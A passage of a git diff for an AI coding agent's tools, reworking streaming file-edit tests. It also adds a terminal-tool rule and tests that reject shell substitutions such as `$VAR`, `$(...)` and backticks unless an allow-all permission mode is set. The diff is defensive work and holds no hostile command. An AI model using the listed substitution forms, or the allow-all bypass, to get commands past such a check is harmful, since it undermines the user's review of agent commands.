cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup: resolve the buffer sender.send_partial(json!({ @@ -4492,17 +3523,10 @@ mod tests { })); cx.run_until_parked(); - // Edit 1 targets "bbb\nccc" (lines 2-3) and replaces it with - // text that preserves "ccc\nddd" as a contiguous substring in the - // buffer — so edit 2's old_text will still match after edit 1 is - // applied. - // - // Edit 2 targets "ccc\nddd" (lines 3-4), overlapping with edit 1 on - // line 3 ("ccc"). 
After edit 1 runs, the buffer becomes: - // "aaa\nXXX\nccc\nddd\nddd\neee\n" - // and "ccc\nddd" is still present, so edit 2 would silently - // succeed without early overlap detection. - // + // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the + // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". + // Edit 2's old_text "ccc\nddd" matches the first occurrence + // in the modified buffer and replaces it with "ZZZ". // Edit 3 exists only to mark edit 2 as "complete" during streaming. sender.send_partial(json!({ "display_description": "Overlapping edits", @@ -4517,7 +3541,7 @@ mod tests { cx.run_until_parked(); // Send the final input with all three edits. - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", @@ -4529,228 +3553,645 @@ mod tests { })); let result = task.await; - // We expect a "Conflicting edit ranges" error. Currently the overlap - // goes undetected during streaming and the file gets silently - // corrupted, so this assertion will fail until we add early overlap - // detection. - match result { - Err(StreamingEditFileToolOutput::Error { error }) - if error.contains("Conflicting edit ranges") => {} - Err(StreamingEditFileToolOutput::Error { error }) => { - panic!("Expected 'Conflicting edit ranges' error, got different error: {error}"); - } - Ok(output) => { - panic!("Expected 'Conflicting edit ranges' error, but got success: {output}"); - } - Err(other) => { - panic!("Expected 'Conflicting edit ranges' error, got unexpected output: {other}"); - } - } + let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); } #[gpui::test] async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { - init_test(cx); + let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Stream content incrementally + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\n" + })); + cx.run_until_parked(); + + // Verify buffer has partial content + let buffer = project.update(cx, |project, cx| { + let path = project + .find_project_path("root/dir/new_file.txt", cx) + .unwrap(); + project.get_open_buffer(&path, cx).unwrap() + }); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); + + // Stream more content + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": 
"line 1\nline 2\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); + + // Stream final chunk + sender.send_partial(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "line 1\nline 2\nline 3\n" + ); + + // Send final input + sender.send_full(json!({ + "display_description": "Create new file", + "path": "root/dir/new_file.txt", + "mode": "write", + "content": "line 1\nline 2\nline 3\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, mut receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Get the diff entity from the event stream + receiver.expect_update_fields().await; + let diff = receiver.expect_diff().await; + + // Diff starts pending with no revealed ranges + diff.read_with(cx, |diff, cx| { + assert!(matches!(diff, Diff::Pending(_))); + assert!(!diff.has_revealed_range(cx)); + }); + + // Stream first content chunk + sender.send_partial(json!({ + 
"display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + + // Diff should now have revealed ranges showing the new content + diff.read_with(cx, |diff, cx| { + assert!(diff.has_revealed_range(cx)); + }); + + // Send final input + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + + // Diff is finalized after completion + diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + } + + #[gpui::test] + async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Verify buffer still has old content (no content partial yet) + let buffer = project.update(cx, |project, cx| { + let path = project.find_project_path("root/file.txt", cx).unwrap(); + project.open_buffer(path, cx) + }); + let buffer = buffer.await.unwrap(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "old line 1\nold line 2\nold line 3\n" + ); + + // First content partial replaces old content + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": 
"root/file.txt", + "mode": "write", + "content": "new line 1\n" + })); + cx.run_until_parked(); + assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); + + // Subsequent content partials append + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\n" + })); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |b, _| b.text()), + "new line 1\nnew line 2\n" + ); + + // Send final input with complete content + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new line 1\nnew line 2\nnew line 3\n" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); + assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + } + + #[gpui::test] + async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Simulate JSON fixer producing a literal backslash when the LLM + // stream cuts in the middle of a \n escape sequence. 
+ // The old_text "hello\nworld" would be streamed as: + // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) + // partial 2: old_text = "hello\nworld" (fixer corrected the escape) + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\\"}] + })); + cx.run_until_parked(); + + // Now the fixer corrects it to the real newline. + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld"}] + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); + } + + #[gpui::test] + async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + sender.send_full(json!({ + "display_description": "Edit", + "path": "root/file.txt", + "mode": "edit", + "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" + })); + + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "HELLO\nWORLD\n"); + } + + // Verifies that after streaming_edit_file_tool edits a file, the action log + // reports changed buffers so that the Accept All / Reject All review UI appears. + #[gpui::test] + async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit lines".to_string(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + event_stream, + cx, + ) + }); + + let result = task.await; + assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming edit, + but no changed buffers were found - Accept All / Reject All will not appear" + ); + } + + // Same test but for Write mode (overwrite entire file). 
+ #[gpui::test] + async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( + cx: &mut TestAppContext, + ) { + let (tool, _project, action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "original content"})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); + + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Overwrite file".to_string(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("completely new content".into()), + edits: None, + }), + event_stream, cx, ) }); - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); + let result = task.await; + assert!(result.is_ok(), "write should succeed: {:?}", result.err()); + + cx.run_until_parked(); + + let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log.changed_buffers() should be non-empty after streaming write, \ + but no changed buffers were found \u{2014} Accept All / Reject All will not appear" + ); + } + + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite 
file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root" + })); + cx.run_until_parked(); + + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + "path": "root/file.txt" + })); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); + let result = task.await; + let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new_content"); + } - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create" + "display_description": "Overwrite file", + "mode": "edit" })); cx.run_until_parked(); - // Stream content incrementally sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content"}] })); cx.run_until_parked(); - // Verify buffer has partial content - let buffer = project.update(cx, |project, cx| { - let path = project - .find_project_path("root/dir/new_file.txt", cx) - .unwrap(); - project.get_open_buffer(&path, cx).unwrap() 
- }); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); - - // Stream more content sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}] })); cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); - // Stream final chunk sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\nline 3\n" + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root" })); cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "line 1\nline 2\nline 3\n" - ); - // Send final input - sender.send_final(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "create", - "content": "line 1\nline 2\nline 3\n" + // Send final. + sender.send_full(json!({ + "display_description": "Overwrite file", + "mode": "edit", + "edits": [{"old_text": "old_content", "new_text": "new_content"}], + "path": "root/file.txt" })); + cx.run_until_parked(); let result = task.await; let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { panic!("expected success"); }; - assert_eq!(new_text, "line 1\nline 2\nline 3\n"); + assert_eq!(new_text, "new_content"); } #[gpui::test] - async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "old line 1\nold line 2\nold line 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); + async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { + let file_content = indoc::indoc! 
{r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } - let (sender, input) = ToolInput::::test(); - let (event_stream, mut receiver) = ToolCallEventStream::test(); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#} + .to_string(); - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite" - })); - cx.run_until_parked(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; - // Get the diff entity from the event stream - receiver.expect_update_fields().await; - let diff = receiver.expect_diff().await; + // The model sends old_text with a PARTIAL last line. + let old_text = "}\n\n\n\nfn render_search"; + let new_text = "}\n\nfn render_search"; - // Diff starts pending with no revealed ranges - diff.read_with(cx, |diff, cx| { - assert!(matches!(diff, Diff::Pending(_))); - assert!(!diff.has_revealed_range(cx)); - }); + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Stream first content chunk - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\n" + sender.send_full(json!({ + "display_description": "Remove extra blank lines", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] })); - cx.run_until_parked(); - // Diff should now have revealed ranges showing the new content - diff.read_with(cx, |diff, cx| { - assert!(diff.has_revealed_range(cx)); - }); + let result = task.await; + let 
StreamingEditFileToolOutput::Success { + new_text: final_text, + .. + } = result.unwrap() + else { + panic!("expected success"); + }; - // Send final input - sender.send_final(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\n" + // The edit should reduce 3 blank lines to 1 blank line before + // fn render_search, without duplicating the function signature. + let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should only remove blank lines before render_search" + ); + } + + #[gpui::test] + async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( + cx: &mut TestAppContext, + ) { + let file_content = "before\ntarget\n\nafter\n"; + let old_text = "target\n"; + let new_text = "one\ntwo\ntarget\n"; + let expected = "before\none\ntwo\ntarget\n\nafter\n"; + + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.rs": file_content})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_full(json!({ + "display_description": "description", + "path": "root/file.rs", + "mode": "edit", + "edits": [{"old_text": old_text, "new_text": new_text}] })); let result = task.await; + let StreamingEditFileToolOutput::Success { - new_text, old_text, .. + new_text: final_text, + .. 
} = result.unwrap() else { panic!("expected success"); }; - assert_eq!(new_text, "new line 1\nnew line 2\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - // Diff is finalized after completion - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); + pretty_assertions::assert_eq!( + final_text, + expected, + "Edit should preserve a single blank line before test_after" + ); } #[gpui::test] - async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { - init_test(cx); + async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { + let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + agent_settings::AgentSettings::override_global(settings, cx); + }); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "old line 1\nold line 2\nold line 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + // Create a new file via the streaming edit file tool + let (event_stream, _rx) = ToolCallEventStream::test(); + let task = cx.update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + event_stream, + cx, + ) + }); + let result = task.await; + assert!(result.is_ok(), "create should succeed: {:?}", result.err()); + cx.run_until_parked(); + + assert!( + fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should exist after creation" + ); + + // Reject all edits — this should delete the newly created file + let changed = action_log.read_with(cx, |log, cx| 
log.changed_buffers(cx)); + assert!( + !changed.is_empty(), + "action_log should track the created file as changed" + ); + + action_log + .update(cx, |log, cx| log.reject_all_edits(None, cx)) + .await; + cx.run_until_parked(); + + assert!( + !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, + "file should be deleted after rejecting creation, but an empty file was left behind" + ); + } + + async fn setup_test_with_fs( + cx: &mut TestAppContext, + fs: Arc, + worktree_paths: &[&std::path::Path], + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); let context_server_registry = cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); @@ -4765,76 +4206,30 @@ mod tests { cx, ) }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); let tool = Arc::new(StreamingEditFileTool::new( project.clone(), thread.downgrade(), + action_log.clone(), language_registry, )); + (tool, project, action_log, fs, thread) + } - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite" - })); - cx.run_until_parked(); - - // Verify buffer still has old content (no content partial yet) - let buffer = project.update(cx, |project, cx| { - let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.get_open_buffer(&path, cx).unwrap() - }); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "old line 1\nold line 2\nold line 3\n" - ); - - // First content partial replaces old content - sender.send_partial(json!({ - "display_description": "Overwrite file", - 
"path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); - - // Subsequent content partials append - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "new line 1\nnew line 2\n" - ); - - // Send final input with complete content - sender.send_final(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "overwrite", - "content": "new line 1\nnew line 2\nnew line 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); + async fn setup_test( + cx: &mut TestAppContext, + initial_tree: serde_json::Value, + ) -> ( + Arc, + Entity, + Entity, + Arc, + Entity, + ) { + init_test(cx); + let fs = project::FakeFs::new(cx.executor()); + fs.insert_tree("/root", initial_tree).await; + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await } fn init_test(cx: &mut TestAppContext) { diff --git a/crates/agent/src/tools/terminal_tool.rs b/crates/agent/src/tools/terminal_tool.rs index 6396bd1b0e63b46a0207dd7df9b9f2fcd00176b7..f36bd0fe3d3fb00931a7dc272d76eb042f6570f6 100644 --- a/crates/agent/src/tools/terminal_tool.rs +++ b/crates/agent/src/tools/terminal_tool.rs @@ -29,6 +29,8 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// /// Make sure you use the `cd` parameter to navigate to one of the root directories of the project. NEVER do it as part of the `command` itself, otherwise it will error. 
/// +/// Do not generate terminal commands that use shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`. Resolve those values yourself before calling this tool, or ask the user for the literal value to use. +/// /// Do not use this tool for commands that run indefinitely, such as servers (like `npm run start`, `npm run dev`, `python -m http.server`, etc) or file watchers that don't terminate on their own. /// /// For potentially long-running commands, prefer specifying `timeout_ms` to bound runtime and prevent indefinite hangs. @@ -39,7 +41,7 @@ const COMMAND_OUTPUT_LIMIT: u64 = 16 * 1024; /// Some commands can be configured not to do this, such as `git --no-pager diff` and similar. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct TerminalToolInput { - /// The one-liner command to execute. + /// The one-liner command to execute. Do not include shell substitutions or interpolations such as `$VAR`, `${VAR}`, `$(...)`, backticks, `$((...))`, `<(...)`, or `>(...)`; resolve those values first or ask the user. pub command: String, /// Working directory for the command. This must be one of the root directories of the project. 
pub cd: String, @@ -628,4 +630,824 @@ mod tests { result ); } + + #[gpui::test] + async fn test_run_rejects_invalid_substitution_before_terminal_creation( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default() + .with_terminal(crate::tests::FakeTerminalHandle::new_never_exits(cx)) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let result = task.await; + let error = result.expect_err("expected invalid terminal command to be rejected"); + assert!( + error.contains("does not allow shell substitutions or interpolations"), + "expected explicit invalid-command message, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for invalid commands" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) + ), + "invalid command should not request authorization" + ); + assert!( + !matches!( + rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallUpdate( + acp_thread::ToolCallUpdate::UpdateFields(_) + ))) + ), + "invalid 
command should not emit a terminal card update" + ); + } + + #[gpui::test] + async fn test_run_allows_invalid_substitution_in_unconditional_allow_all_mode( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Allow; + settings.tool_permissions.tools.remove(TerminalTool::NAME); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $HOME".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "expected terminal content update in unconditional allow-all mode" + ); + + let result = task + .await + .expect("command should proceed in unconditional allow-all mode"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected invalid-command rejection output: {result}" + ); + } + + #[gpui::test] + async fn 
